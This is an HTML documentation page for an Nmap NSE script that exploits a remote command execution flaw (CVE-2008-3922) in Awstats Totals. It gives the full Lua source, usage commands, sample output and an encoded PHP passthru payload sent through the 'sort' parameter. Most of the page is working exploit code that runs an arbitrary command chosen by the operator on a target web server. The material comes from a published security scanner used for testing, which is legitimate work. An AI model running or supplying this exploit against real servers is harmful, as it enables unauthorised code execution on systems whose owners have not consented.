<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File http-awstatstotals-exec</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth,auth,auth<br/>
<b>Author:</b> Paulino Calderon <calderon@websec.mx><br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://nmap.org/nsedoc/scripts/http-awstatstotals-exec.html">https://nmap.org/nsedoc/scripts/http-awstatstotals-exec.html</a><br/>
<h3>Summary</h3>
<p>Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922).</p>
<p>This vulnerability can be exploited through the GET variable sort. The script queries the web server with the command payload encoded using PHP's chr() function:</p>
<p>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</p>
<p>Common paths for Awstats Total:</p>
<ul>
<li>/awstats/index.php</li>
<li>/awstatstotals/index.php</li>
<li>/awstats/awstatstotals.php</li>
</ul>
<p>References:</p>
<ul>
<li><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922" target=_blank>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922</a></li>
<li><a href="http://www.exploit-db.com/exploits/17324/" target=_blank>http://www.exploit-db.com/exploits/17324/</a></li>
</ul>
<h3>Arguments</h3>
<table>
<tr><td>http-awstatstotals-exec.uri:</td><td>Awstats Totals URI including path. Default: /index.php</td></tr>
<tr><td>http-awstatstotals-exec.cmd:</td><td>Command to execute. Default: whoami</td></tr>
<tr><td>http-awstatstotals-exec.outfile:</td><td>Output file. If set it saves the output in this file. Other useful args when running this script: http.useragent - User Agent to use in GET request</td></tr>
<tr><td>slaxml.debug:</td><td>See the documentation for the <a href="nmap/libraries/slaxml.htm">slaxml</a> library</td></tr>
<tr><td>http.host:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-body-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-cache-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.truncated-ok:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.useragent:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>smbdomain:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbhash:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbnoguest:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbpassword:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbtype:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbusername:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap -sV --script http-awstatstotals-exec.nse --script-args &#39;http-awstatstotals-exec.cmd=&quot;uname -a&quot;, http-awstatstotals-exec.uri=/awstats/index.php&#39; &lt;target&gt;
nmap -sV --script http-awstatstotals-exec.nse &lt;target&gt;</pre>
<h3>Output</h3>
<pre>PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-awstatstotals-exec.nse:
|_Output for &#39;uname -a&#39;:Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/http.htm">http</a></li>
<li><a href="nmap/libraries/io.htm">io</a></li>
<li><a href="nmap/libraries/nmap.htm">nmap</a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/string.htm">string</a></li>
<li><a href="nmap/libraries/table.htm">table</a></li>
</ul>
<h3>Code</h3>
<pre>local http = require &quot;http&quot;
local io = require &quot;io&quot;
local nmap = require &quot;nmap&quot;
local shortport = require &quot;shortport&quot;
local stdnse = require &quot;stdnse&quot;
local string = require &quot;string&quot;
local table = require &quot;table&quot;

description = [[
Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14
and possibly other products based on it (CVE: 2008-3922).

This vulnerability can be exploited through the GET variable &lt;code&gt;sort&lt;/code&gt;.
The script queries the web server with the command payload encoded using PHP&#39;s
chr() function:

&lt;code&gt;?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}&lt;/code&gt;

Common paths for Awstats Total:
* &lt;code&gt;/awstats/index.php&lt;/code&gt;
* &lt;code&gt;/awstatstotals/index.php&lt;/code&gt;
* &lt;code&gt;/awstats/awstatstotals.php&lt;/code&gt;

References:
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922
* http://www.exploit-db.com/exploits/17324/
]]

---
-- @usage
-- nmap -sV --script http-awstatstotals-exec.nse --script-args &#39;http-awstatstotals-exec.cmd=&quot;uname -a&quot;, http-awstatstotals-exec.uri=/awstats/index.php&#39; &lt;target&gt;
-- nmap -sV --script http-awstatstotals-exec.nse &lt;target&gt;
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-awstatstotals-exec.nse:
-- |_Output for &#39;uname -a&#39;:Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
--
-- @args http-awstatstotals-exec.uri Awstats Totals URI including path. Default: /index.php
-- @args http-awstatstotals-exec.cmd Command to execute. Default: whoami
-- @args http-awstatstotals-exec.outfile Output file. If set it saves the output in this file.
---
-- Other useful args when running this script:
-- http.useragent - User Agent to use in GET request
--

author = &quot;Paulino Calderon &lt;calderon@websec.mx&gt;&quot;
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = {&quot;vuln&quot;, &quot;intrusive&quot;, &quot;exploit&quot;}


portrule = shortport.http

--default values
local DEFAULT_CMD = &quot;whoami&quot;
local DEFAULT_URI = &quot;/index.php&quot;

---
--Writes string to file
-- @param filename Filename to write
-- @param content Content string
-- @return boolean status
-- @return string error
--Taken from: hostmap.nse
local function write_file(filename, contents)
  local f, err = io.open(filename, &quot;w&quot;)
  if not f then
    return f, err
  end
  f:write(contents)
  f:close()
  return true
end

---
--Checks if Awstats Totals installation seems to be there
-- @param host Host table
-- @param port Port table
-- @param path Path pointing to AWStats Totals
-- @return true if awstats totals is found
local function check_installation(host, port, path)
  local check_req = http.get(host, port, path)
  if not(http.response_contains(check_req, &quot;AWStats&quot;)) then
    return false
  end
  return true
end

---
--MAIN
---
action = function(host, port)
  local output = {}
  local uri = stdnse.get_script_args(&quot;http-awstatstotals-exec.uri&quot;) or DEFAULT_URI
  local cmd = stdnse.get_script_args(&quot;http-awstatstotals-exec.cmd&quot;) or DEFAULT_CMD
  local out = stdnse.get_script_args(&quot;http-awstatstotals-exec.outfile&quot;)

  --check for awstats signature
  local awstats_check = check_installation(host, port, uri)
  if not(awstats_check) then
    stdnse.debug1(&quot;This does not look like Awstats Totals. Quitting.&quot;)
    return
  end

  --Encode payload using PHP&#39;s chr()
  local encoded_payload = {}
  cmd:gsub(&quot;.&quot;, function(c) encoded_payload[#encoded_payload+1] = (&quot;chr(%s)&quot;):format(string.byte(c)) end)
  local stealth_payload = &quot;?sort={%24{passthru%28&quot;..table.concat(encoded_payload,&#39;.&#39;)..&quot;%29}}{%24{exit%28%29}}&quot;

  --set payload and send request
  local req = http.get(host, port, uri .. stealth_payload)
  if req.status and req.status == 200 then
    output[#output+1] = string.format(&quot;\nOutput for &#39;%s&#39;:%s&quot;, cmd, req.body)

    --if out set, save output to file
    if out then
      local status, err = write_file(out,  req.body)
      if status then
        output[#output+1] = string.format(&quot;Output saved to %s\n&quot;, out)
      else
        output[#output+1] = string.format(&quot;Error saving output to %s: %s\n&quot;, out, err)
      end
    end

  else
    if nmap.verbosity()&gt;= 2 then
      output[#output+1] = &quot;[Error] Request did not return 200. Make sure your URI value is correct. A WAF might be blocking your request&quot;
    end
  end

  --output
  if #output&gt;0 then
    return table.concat(output, &quot;\n&quot;)
  end
end</pre>
